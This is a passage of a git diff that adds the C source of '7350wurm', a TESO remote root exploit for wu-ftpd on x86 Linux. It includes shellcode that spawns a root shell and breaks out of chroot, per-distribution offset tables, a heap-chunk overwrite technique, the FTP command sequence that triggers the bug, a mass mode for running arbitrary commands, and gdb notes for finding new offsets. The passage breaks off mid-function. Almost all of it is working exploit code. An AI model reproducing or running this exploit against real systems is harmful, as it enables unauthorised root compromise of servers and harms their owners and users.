+                                (tv_start.tv_usec))) > (sec * 1000000))
+                        {
+                                return (-1);
+                        }
+                }
+                n = net_rtimeout(fd, NET_READTIMEOUT);
+                if (n <= 0) {
+                        return (-1);
+                }
+                n = read(fd, buf, 1);
+                if (n <= 0) {
+                        return (n);
+                }
+                rb++;
+                if (*buf == '\n')
+                        return (rb);
+                buf++;
+                if (rb >= bufsize)
+                        return (-2);    /* buffer full */
+        } while (1);
+}
+int
+net_rtimeout (int fd, int sec)
+{
+        fd_set          rset;
+        struct timeval  tv;
+        int             n, error, flags;
+        error = 0;
+        flags = fcntl(fd, F_GETFL, 0);
+        n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1)
+                return (-1);
+        FD_ZERO(&rset);
+        FD_SET(fd, &rset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        /* now we wait until more data is received then the tcp low level
+         * watermark, which should be setted to 1 in this case (1 is default)
+         */
+        n = select(fd + 1, &rset, NULL, NULL, &tv);
+        if (n == 0) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1) {
+                return (-1);
+        }
+        /* socket readable ? */
+        if (FD_ISSET(fd, &rset)) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                return (1);
+        } else {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+}
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv)
+{
+        int     i;
+        size_t  tl_orig = target_len;
+        if (strlen (shellcode) >= (target_len - 1))
+                return (-1);
+        memcpy (target, shellcode, strlen (shellcode));
+        target += strlen (shellcode);
+        target_len -= strlen (shellcode);
+        for (i = 0 ; argv[i] != NULL ; ++i)
+                ;
+        /* set argument count
+         */
+        target[0] = (unsigned char) i;
+        target++;
+        target_len--;
+        for ( ; i > 0 ; ) {
+                i -= 1;
+                if (strlen (argv[i]) >= target_len)
+                        return (-1);
+                printf ("[%3d/%3d] adding (%2d): %s\n",
+                        (tl_orig - target_len), tl_orig,
+                        strlen (argv[i]), argv[i]);
+                memcpy (target, argv[i], strlen (argv[i]));
+                target += strlen (argv[i]);
+                target_len -= strlen (argv[i]);
+                target[0] = (unsigned char) (i + 1);
+                target++;
+                target_len -= 1;
+        }
+        return (tl_orig - target_len);
+}
diff --git a/exploits/7350wurm/7350wurm-backup3.c b/exploits/7350wurm/7350wurm-backup3.c
new file mode 100644
index 0000000..2638dd7
--- /dev/null
+++ b/exploits/7350wurm/7350wurm-backup3.c
@@ -0,0 +1,1235 @@
+/* 7350wurm - x86/linux wu-ftpd remote root exploit
+ *
+ * TESO CONFIDENTIAL - SOURCE MATERIALS
+ *
+ * This is unpublished proprietary source code of TESO Security.
+ *
+ * The contents of these coded instructions, statements and computer
+ * programs may not be disclosed to third parties, copied or duplicated in
+ * any form, in whole or in part, without the prior written permission of
+ * TESO Security. This includes especially the Bugtraq mailing list, the
+ * www.hack.co.za website and any public exploit archive.
+ *
+ * The distribution restrictions cover the entire file, including this
+ * header notice. (This means, you are not allowed to reproduce the header).
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ *****************************************************************************
+ * thanks to bnuts, tomas, dvorak, scrippie and max for hints, discussions and
+ * ideas (synnergy.net rocks, thank you buddies ! :).
+ */
+#define VERSION "0.1.1"
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <arpa/telnet.h>
+#include <netdb.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdarg.h>
+#include <string.h>
+#include <time.h>
+#define INIT_CMD        "unset HISTFILE;id;uname -a;\n"
+/* shellcodes
+ */
+unsigned char   x86_lnx_loop[] =
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\xeb\xfe";
+/* x86/linux write/read/exec code (41 bytes)
+ * does: 1. write (1, "\nsP\n", 4);
+ *       2. read (0, ncode, 0xff);
+ *       3. jmp ncode
+ */
+unsigned char   x86_wrx[] =
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xdb\x43\xb8\x0b\x74\x51\x0b\x2d\x01\x01\x01"
+        "\x01\x50\x89\xe1\x6a\x04\x58\x89\xc2\xcd\x80\xeb"
+        "\x0e\x31\xdb\xf7\xe3\xfe\xca\x59\x6a\x03\x58\xcd"
+        "\x80\xeb\x05\xe8\xed\xff\xff\xff";
+unsigned char   x86_lnx_execve[] =
+        /* 49 byte x86 linux PIC setreuid(0,0) + chroot-break
+         * code by lorian / teso
+         */
+        "\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
+        "\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
+        "\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
+        "\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
+        "\x80"
+        /* 33 byte x86/linux PIC argv -sc
+         */
+        "\xeb\x1c\x5f\x31\xc0\x50\x8a\x07\x47\x57\xae\x75"
+        "\xfd\x88\x67\xff\x48\x75\xf6\x5b\x53\x50\x5a\x89"
+//      "\xe1\xb0\x0b\xcd\x80\xe8\xdf\xff\xff\xff";
+/*FIXME*/"\xe1\xb0\x0b\xcc\xcd\x80\xe8\xdf\xff\xff\xff";
+//                      ^^ debug trap
+/* setreuid/chroot/execve
+ * lorian / teso */
+unsigned char   x86_lnx_shell[] =
+        "\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
+        "\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
+        "\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
+        "\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
+        "\x80"
+        "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
+        "\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
+/* HOWTO get the offsets:
+   retloc: objdump -R /usr/sbin/in.ftpd | grep free
+   set retaddr to 0x41414141 and run the exploit:
+   $ ./7 -t <yourtype> -D -v
+   Now when it asks for enter, just press it, but as it asks the second
+   time, attach GDB to the wuftpd process. Continue it, and press enter
+   in the exploit. Wuftpd will segfault.
+   Do:
+   (gdb) x/10wx $esp
+   It will show some parameters to free, the first parameter of the form
+   0x08...... is interesting:
+   (gdb) x/64wx 0x08......
+   Should show a block of 0x0ceb0ceb's in memory. Just choose such a place
+   as retloc and there you are.
+ */
+typedef struct {
+        char *                  desc;           /* distribution */
+        char *                  banner;         /* ftp banner part */
+        unsigned char *         shellcode;
+        unsigned int            shellcode_len;
+        unsigned long int       retloc;         /* return address location */
+        unsigned long int       retaddr;        /* return address */
+} tgt_type;
+tgt_type tmanual = {
+        "manual values",
+        "unknown banner",
+        x86_wrx, sizeof (x86_wrx) - 1,
+        0x41414141, 0x42424242
+};
+tgt_type targets[] = {
+        { "Debian sid [wu-ftpd_2.6.1-5_i386.deb]",
+                "Version wu-2.6.1(1) Sat Feb 24 01:43:53 GMT 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806e7a0, 0x08094018 },
+        { "Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]",
+                "Version wu-2.6.0(1) Thu May 25 03:35:34 PDT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x080713e0, 0x08093c40 },
+        { "Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]",
+                "Version wu-2.6.1(1) Mon Jan 29 08:04:31 PST 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08072bd4, 0x080976e0},
+        { "RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.rpm]",
+                "Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08061c48, 0x0806c948 },
+/* TODO: check, does not segfault !
+        { "RedHat 6.0 (Hedwig) [wu-ftpd-2.4.2vr17-3.rpm]",
+                "Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08069f04, 0x41414141 },
+*/
+        { "RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]",
+                "Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806cb88, 0x08089848 },
+        { "RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]",
+                "Version wu-2.6.1-16(1)",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0807314c, 0x08098e40 },
+        /* slackware (from 8 on they use proftpd by default) */
+        { "Slackware 7",
+                "Version wu-2.6.0(1) Fri Oct 22 00:38:20 CDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806d03c, 0x0808f648 },
+        { "Slackware 7.1",
+                "Version wu-2.6.0(1) Tue Jun 27 10:52:28 PDT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806ba2c, 0x08088e48 },
+        { NULL, NULL, 0, 0, 0, 0 },
+};
+/* exploitation related stuff.
+ * DO NOT CHANGE, except you know exactly what you are doing.
+ */
+#define CHUNK_POS       192
+#define MALLOC_ALIGN_MASK       0x07
+#define MALLOC_MINSIZE          0x10
+#define CHUNK_ROUND(s) \
+        (((((s) + 4 + MALLOC_ALIGN_MASK)) < \
+                (MALLOC_MINSIZE + MALLOC_ALIGN_MASK)) ? \
+        (MALLOC_MINSIZE) : ((((s) + 4 + MALLOC_ALIGN_MASK)) & ~MALLOC_ALIGN_MASK))
+/* FTP related stuff
+ */
+char *  dest = "127.0.0.1";     /* can be changed with -d */
+char *  username = "ftp";       /* can be changed with -u */
+char *  password = "mozilla@";  /* can be changed with -p */
+char *  ftp_banner = NULL;
+int     verbose = 0;
+/* FTP prototypes
+ */
+void ftp_escape (unsigned char *buf, unsigned long int buflen);
+void ftp_recv_until (int sock, char *buff, int len, char *begin);
+int ftp_login (char *host, char *user, char *pass);
+/* main prototypes
+ */
+void usage (char *progname);
+tgt_type * tgt_frombanner (unsigned char *banner);
+void shell (int sock);
+void hexdump (char *desc, unsigned char *data, unsigned int amount);
+void xp_buildsize (int fd, unsigned char this_size_ls, unsigned long int csize);
+void xp_gapfill (int fd, int rnfr_num, int rnfr_size);
+int xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len);
+void xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen);
+/*** MASS mode stuff
+ */
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv);
+int             mass = 0;       /* enable with -m (kids, get hurt!) */
+unsigned int    mlen = 0;
+unsigned char   mcode[256];
+/* imported from network.c
+ */
+#define NET_CONNTIMEOUT 60
+#define NET_READTIMEOUT 20
+int     net_conntimeout = NET_CONNTIMEOUT;
+unsigned long int net_resolve (char *host);
+int net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec);
+void net_write (int fd, const char *str, ...);
+int net_rtimeout (int fd, int sec);
+int net_rlinet (int fd, char *buf, int bufsize, int sec);
+/* exploitation related stuff, which is fixed on all wuftpd systems
+ */
+#define RNFR_SIZE       4
+#define RNFR_NUM        73
+int     automode = 0;   /* evil, do not use */
+int     debugmode = 0;
+void
+usage (char *progname)
+{
+        fprintf (stderr, "usage: %s [-h] [-v] [-a] [-D] [-m]\n"
+                "\t[-t <num>] [-u <user>] [-p <pass>] [-d host]\n"
+                "\t[-L <retloc>] [-A <retaddr>]\n\n", progname);
+        fprintf (stderr,
+                "-h\tthis help\n"
+                "-v\tbe verbose (default: off, twice for greater effect)\n"
+                "-a\tAUTO mode (target from banner)\n"
+                "-D\tDEBUG mode (waits for keypresses)\n"
+                "-m\tenable mass mode (use with care)\n"
+                "-t num\tchoose target (0 for list, try -v or -v -v)\n"
+                "-u user\tusername to login to FTP (default: \"ftp\")\n"
+                "-p pass\tpassword to use (default: \"mozilla@\")\n"
+                "-d dest\tIP address or fqhn to connect to "
+                        "(default: 127.0.0.1)\n"
+                "-L loc\toverride target-supplied retloc (format: 0xdeadbeef)\n"
+                "-A addr\toverride target-supplied retaddr (format: 0xcafebabe)\n");
+        fprintf (stderr, "\n");
+        exit (EXIT_FAILURE);
+}
+int
+main (int argc, char *argv[])
+{
+        char                    c;
+        char *                  progname;       /* = argv[0] */
+        int                     fd;
+        tgt_type *              tgt = NULL;
+        int                     tgt_num = -1;
+        unsigned long int       user_retloc = 0,
+                                user_retaddr = 0;
+        unsigned long int       malign = 0;     /* PWD alignment */
+        unsigned char           xpbuf[512 + 16];
+        fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root\n"
+                "team teso (thx bnuts, tomas, synnergy.net !).\n\n");
+        progname = argv[0];
+        if (argc < 2)
+                usage (progname);
+        while ((c = getopt (argc, argv, "M:hvaDmt:u:p:d:L:A:")) != EOF) {
+                switch (c) {
+                case 'M':
+                        if (sscanf (optarg, "%lu", &malign) != 1)
+                                usage (progname);
+                        break;
+                case 'h':
+                        usage (progname);
+                        break;
+                case 'a':
+                        automode = 1;
+                        break;
+                case 'D':
+                        debugmode = 1;
+                        break;
+                case 'v':
+                        verbose += 1;
+                        break;
+                case 'm':
+                        mass = 1;
+                        break;
+                case 't':
+                        if (sscanf (optarg, "%u", &tgt_num) != 1)
+                                usage (progname);
+                        break;
+                case 'u':
+                        username = optarg;
+                        printf ("username = %s\n", optarg);
+                        break;
+                case 'p':
+                        password = optarg;
+                        break;
+                case 'd':
+                        dest = optarg;
+                        break;
+                case 'L':
+                        if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
+                                usage (progname);
+                        break;
+                case 'A':
+                        if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
+                                usage (progname);
+                        break;
+                default:
+                        usage (progname);
+                        break;
+                }
+        }
+        /* if both required offsets are given manually, then we dont have
+         * to require a target selection. otherwise check whether the target
+         * is within the list. if its not, then print a list of available
+         * targets
+         */
+        if (user_retloc != 0 && user_retaddr != 0) {
+                tgt = &tmanual;
+        } else if (automode == 0 && (tgt_num == 0 ||
+                tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
+        {
+                if (tgt_num != 0)
+                        printf ("WARNING: target out of list. giving list\n\n");
+                tgt_num = 0;
+                printf ("num . description\n");
+                printf ("----+-------------------------------------------------------\n");
+                for ( ; targets[tgt_num].desc != NULL ; ++tgt_num) {
+                        printf ("%3d | %s\n", tgt_num + 1,
+                                targets[tgt_num].desc);
+                        if (verbose)
+                                printf ("    :    %s\n", targets[tgt_num].banner);
+                        if (verbose >= 2)
+                                printf ("    :    retloc: 0x%08lx   "
+                                        "retaddr: 0x%08lx\n",
+                                        targets[tgt_num].retloc,
+                                        targets[tgt_num].retaddr);
+                }
+                printf ("    '\n");
+                exit (EXIT_SUCCESS);
+        }
+        if (tgt == NULL && automode == 0)
+                tgt = &targets[tgt_num - 1];
+        if (mass == 1) {
+                if ((argc - optind) == 0)
+                        usage (progname);
+                mlen = sc_build_x86_lnx (mcode, sizeof (mcode),
+                        x86_lnx_execve, &argv[optind]);
+                if (mlen >= 0xff) {
+                        fprintf (stderr, "created argv-code too long "
+                                "(%d bytes)\n", mlen);
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
+        }
+        printf ("# trying to log into %s with (%s/%s) ...", dest,
+                username, password);
+        fflush (stdout);
+        fd = ftp_login (dest, username, password);
+        if (fd <= 0) {
+                fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
+                exit (EXIT_FAILURE);
+        }
+        printf (" connected.\n");
+        if (debugmode) {
+                printf ("DEBUG: press enter\n");
+                getchar ();
+        }
+        printf ("# banner: %s", (ftp_banner == NULL) ? "???" :
+                ftp_banner);
+        if (tgt == NULL && automode) {
+                tgt = tgt_frombanner (ftp_banner);
+                if (tgt == NULL) {
+                        printf ("# failed to jield target from banner, aborting\n");
+                        exit (EXIT_FAILURE);
+                }
+                printf ("# successfully selected target from banner\n");
+        }
+        if (user_retaddr != 0) {
+                fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n",
+                        user_retaddr);
+                tgt->retaddr = user_retaddr;
+        }
+        if (user_retloc != 0) {
+                fprintf (stderr, "# overriding target retloc with: 0x%08lx\n",
+                        user_retloc);
+                tgt->retloc = user_retloc;
+        }
+        printf ("\n### TARGET: %s\n\n", tgt->desc);
+        /* real stuff starts from here
+         */
+        printf ("# 1. filling memory gaps\n");
+        xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);
+        printf ("# 2. sending bigbuf + fakechunk\n");
+        xp_build (tgt, xpbuf, 500 - strlen ("LIST "));
+        if (verbose)
+                hexdump ("xpbuf", xpbuf, strlen (xpbuf));
+        ftp_escape (xpbuf, sizeof (xpbuf));
+        net_write (fd, "CWD %s\n", xpbuf);
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "550 ");
+        /* synnergy.net uberleet method (thank you very much guys !)
+         */
+        net_write (fd, "CWD ~/{.,.,.,.}\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
+        /* now, we flush the last-used-chunk marker in glibc malloc code. else
+         * we might land in a previously used bigger chunk, but we need a
+         * sequential order. "CWD ." will allocate a two byte chunk, which will
+         * be reused on any later small malloc.
+         */
+        net_write (fd, "CWD .\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
+        xp_gapfill (fd, 1, 16); /* cause chunk w/ 0x20 size */
+        {
+                unsigned long int       dir_chunk_size,
+                                        bridge_dist,
+                                        padchunk_size,
+                                        fakechunk_size;
+                unsigned char *         dl;     /* dirlength */
+                net_write (fd, "PWD\n");
+                ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "257 ");
+                dl = strchr (xpbuf, '"');
+                if (dl == NULL || strchr (dl + 1, '"') == NULL) {
+                        fprintf (stderr, "faulty PWD reply: %s\n", xpbuf);
+                        exit (EXIT_FAILURE);
+                }
+                dir_chunk_size = 0;
+                for (dl += 1 ; *dl != '"' ; ++dl)
+                        dir_chunk_size += 1;
+                dir_chunk_size += 3;    /* ~/ + NUL byte */
+#if 0
+                dir_chunk_size = (dir_chunk_size + 7) & ~7;
+                dir_chunk_size = (dir_chunk_size + 4 + 7) & ~7;
+#endif
+                dir_chunk_size = CHUNK_ROUND (dir_chunk_size);
+                printf ("dir_chunk_size = 0x%08lx\n", dir_chunk_size);
+                /* 0x10 (CWD ~/{.,.,.,.}) + 4 * dirchunk */
+                bridge_dist = 0x10 + 4 * dir_chunk_size;
+                printf ("bridge_dist = 0x%08lx\n", bridge_dist);
+                /* 0x18 (RNFR 16), dcs (RNFR dir), 0x10 (CWD ~{) */
+                padchunk_size = bridge_dist - 0x18 - dir_chunk_size - 0x10;
+                printf ("padchunk_size = 0x%08lx\n", padchunk_size);
+                /* +4 = this_size field itself */
+                fakechunk_size = CHUNK_POS - 0x1c + 4;
+#if 0
+                fakechunk_size = 0x18 + /* RNFR 16* */
+                        0x10 +          /* RNFR . */
+                        padchunk_size + /* RNFR padding */
+                        0x10 +          /* CWD ~{ */
+                        0x10;           /* globlist = malloc(...) */
+#endif
+                fakechunk_size |= 0x1;  /* PREV_INUSE */
+                printf ("fakechunk_size = 0x%08lx\n", fakechunk_size);
+                xp_buildsize (fd, fakechunk_size, dir_chunk_size);
+                /* pad down to the minimum possible size in 8 byte alignment
+                 */
+                xp_gapfill (fd, 1, padchunk_size - 8 - 1);
+        }
+        if (debugmode) {
+                printf ("press enter\n");
+                getchar ();
+        }
+        printf ("# 3. triggering free(globlist[1])\n");
+        net_write (fd, "CWD ~{\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
+        if (strncmp (xpbuf, "sP", 2) != 0) {
+                fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n",
+                        xpbuf);
+                exit (EXIT_FAILURE);
+        }
+        printf ("#\n# exploitation succeeded. sending real shellcode\n");
+        if (mass == 1) {
+                printf ("# mass mode, sending constructed argv code\n");
+                net_write (fd, "%s\n", mcode);
+                printf ("# send. sleeping 10 seconds\n");
+                sleep (10);
+                printf ("# success.\n");
+                exit (EXIT_SUCCESS);
+        }
+        printf ("# sending setreuid/chroot/execve shellcode\n");
+        net_write (fd, "%s", x86_lnx_shell);
+        printf ("# spawning shell\n");
+        printf ("##################################################"
+                        "##########################\n");
+        write (fd, INIT_CMD, strlen (INIT_CMD));
+        shell (fd);
+        exit (EXIT_SUCCESS);
+}
+tgt_type *
+tgt_frombanner (unsigned char *banner)
+{
+        int     tw;     /* target list walker */
+        for (tw = 0 ; targets[tw].desc != NULL ; ++tw) {
+                if (strstr (banner, targets[tw].banner) != NULL)
+                        return (&targets[tw]);
+        }
+        return (NULL);
+}
+/* xp_buildsize
+ *
+ * set chunksize to this_size_ls. do this in a csize bytes long chunk.
+ * normally csize = 0x10. csize is always a padded chunksize.
+ */
+void
+xp_buildsize (int fd, unsigned char this_size_ls, unsigned long int csize)
+{
+        int             n,
+                        cw,     /* chunk walker */
+                        bw;     /* back walker */
+        unsigned char   tmpbuf[512];
+        unsigned char * leet = "7350";
+        for (n = 2 ; n > 0 ; --n) {
+                memset (tmpbuf, '\0', sizeof (tmpbuf));
+                for (cw = 0 ; cw < (csize - 0x08) ; ++cw)
+                        tmpbuf[cw] = leet[cw % 4];
+                tmpbuf[cw - 4 + n] = '\0';
+                printf (": CWD %s\n", tmpbuf);
+                net_write (fd, "CWD %s\n", tmpbuf);
+                ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
+        }
+        memset (tmpbuf, '\0', sizeof (tmpbuf));
+        for (cw = 0 ; cw < (csize - 0x08 - 0x04) ; ++cw)
+                tmpbuf[cw] = leet[cw % 4];
+        printf ("| CWD %s\n", tmpbuf);
+        net_write (fd, "CWD %s%c\n", tmpbuf, this_size_ls);
+        ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
+        /* send a minimum-sized malloc request that will allocate a chunk
+         * with 'csize' overall bytes
+         */
+        if (csize == 0x10) {    /* minimum size of a chunk, yay */
+                xp_gapfill (fd, 1, 1);
+        } else {
+                xp_gapfill (fd, 1, csize - 8 - 7);      /* its the same */
+        }
+        return;
+}
+#if 0
+void
+xp_buildsize (int fd, unsigned char this_size_ls, unsigned long int csize)
+{
+        int             n;
+        char *          rst_arr[3] = { "7350foo", "7350fo", NULL };
+        unsigned char   tmpbuf[512];
+        for (n = 0 ; rst_arr[n] != NULL ; ++n) {
+                net_write (fd, "CWD %s\n", rst_arr[n]);
+                ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
+        }
+        net_write (fd, "CWD 7350%c\n", this_size_ls);
+        ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
+        xp_gapfill (fd, 1, 1);                  /* protect this_size */
+        return;
+}
+#endif
+/* xp_gapfill
+ *
+ * fill all small memory gaps in wuftpd malloc space. do this by sending
+ * rnfr requests which cause a memleak in wuftpd.
+ *
+ * return in any case
+ */
+void
+xp_gapfill (int fd, int rnfr_num, int rnfr_size)
+{
+        int             n;
+        unsigned char * rb;             /* rnfr buffer */
+        unsigned char * rbw;            /* rnfr buffer walker */
+        unsigned char   rcv_buf[512];   /* temporary receive buffer */
+        rbw = rb = calloc (1, rnfr_size + 6);
+        strcpy (rbw, "RNFR ");
+        rbw += strlen (rbw);
+        /* append a string of "././././". since wuftpd only checks whether
+         * the pathname is lstat'able, it will go through without any problems
+         */
+        for (n = 0 ; n < rnfr_size ; ++n)
+                strcat (rbw, ((n % 2) == 0) ? "." : "/");
+        strcat (rbw, "\n");
+        for (n = 0 ; n < rnfr_num; ++n) {
+                net_write (fd, "%s", rb);
+                ftp_recv_until (fd, rcv_buf, sizeof (rcv_buf), "350 ");
+        }
+        free (rb);
+        return;
+}
+#define ADDR_STORE(ptr,addr){\
+        ((unsigned char *) (ptr))[0] = (addr) & 0xff;\
+        ((unsigned char *) (ptr))[1] = ((addr) >> 8) & 0xff;\
+        ((unsigned char *) (ptr))[2] = ((addr) >> 16) & 0xff;\
+        ((unsigned char *) (ptr))[3] = ((addr) >> 24) & 0xff;\
+}
+int
+xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len)
+{
+        unsigned char * wl;
+        memset (buf, '\0', buf_len);
+        memset (buf, '0', CHUNK_POS);
+        xp_buildchunk (tgt, buf + CHUNK_POS, buf_len - CHUNK_POS - 1);
+        for (wl = buf + strlen (buf) ; wl < &buf[buf_len - 1] ; wl += 2) {
+                wl[0] = '\xeb';
+                wl[1] = '\x0c';
+        }
+        memcpy (&buf[buf_len - 1] - tgt->shellcode_len, tgt->shellcode,
+                tgt->shellcode_len);
+        return (strlen (buf));
+}
+/* xp_buildchunk
+ *
+ * build the fake malloc chunk that will overwrite retloc with retaddr
+ */
+void
+xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen)
+{
+        fprintf (stderr, "\tbuilding chunk: ([0x%08lx] = 0x%08lx) in %d bytes\n",
+                tgt->retloc, tgt->retaddr, clen);
+        /* easy, straight forward technique
+         */
+        ADDR_STORE (&cspace[0], 0xfffffff0);            /* prev_size */
+        ADDR_STORE (&cspace[4], 0xfffffffc);            /* this_size */
+        ADDR_STORE (&cspace[8], tgt->retloc - 12);      /* fd */
+        ADDR_STORE (&cspace[12], tgt->retaddr);         /* bk */ 
+        return;
+}
+void
+shell (int sock)
+{
+        int     l;
+        char    buf[512];
+        fd_set  rfds;
+        while (1) {
+                FD_SET (0, &rfds);
+                FD_SET (sock, &rfds);
+                select (sock + 1, &rfds, NULL, NULL, NULL);
+                if (FD_ISSET (0, &rfds)) {
+                        l = read (0, buf, sizeof (buf));
+                        if (l <= 0) {
+                                perror ("read user");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (sock, buf, l);
+                }
+                if (FD_ISSET (sock, &rfds)) {
+                        l = read (sock, buf, sizeof (buf));
+                        if (l == 0) {
+                                printf ("connection closed by foreign host.\n");
+                                exit (EXIT_FAILURE);
+                        } else if (l < 0) {
+                                perror ("read remote");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (1, buf, l);
+                }
+        }
+}
+/*** FTP functions
+ */
+/* FTP is TELNET is SHIT.
+ */
+void
+ftp_escape (unsigned char *buf, unsigned long int buflen)
+{
+        unsigned char * obuf = buf;
+        for ( ; *buf != '\0' ; ++buf) {
+                if (*buf == 0xff &&
+                        (((buf - obuf) + strlen (buf) + 1) < buflen))
+                {
+                        memmove (buf + 1, buf, strlen (buf) + 1);
+                        buf += 1;
+                }
+        }
+}
+void
+ftp_recv_until (int sock, char *buff, int len, char *begin)
+{
+        char    dbuff[2048];
+        if (buff == NULL) {
+                buff = dbuff;
+                len = sizeof (dbuff);
+        }
+        do {
+                memset (buff, '\x00', len);
+                if (net_rlinet (sock, buff, len - 1, 20) <= 0)
+                        return;
+        } while (memcmp (buff, begin, strlen (begin)) != 0);
+        return;
+}
+int
+ftp_login (char *host, char *user, char *pass)
+{
+        int     ftpsock;
+        char    resp[512];
+        ftpsock = net_connect (NULL, host, 21, 30);
+        if (ftpsock <= 0)
+                return (0);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline pre-login stuff (rfc violation !)
+         */
+        if (memcmp (resp, "220-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "220 ");
+        if (memcmp (resp, "220 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        ftp_banner = strdup (resp);
+        net_write (ftpsock, "USER %s\n", user);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        if (memcmp (resp, "331 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        net_write (ftpsock, "PASS %s\n", pass);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline responses from ftp servers
+         */
+        if (memcmp (resp, "230-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "230 ");
+        if (memcmp (resp, "230 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        return (ftpsock);
+flerr:
+        if (ftpsock > 0)
+                close (ftpsock);
+        return (0);
+}
+/* ripped from zodiac */
+void
+hexdump (char *desc, unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+        printf ("/* %s, %u bytes */\n", desc, amount);
+        for (dp = 1; dp <= amount; dp++) {
+                fprintf (stderr, "%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
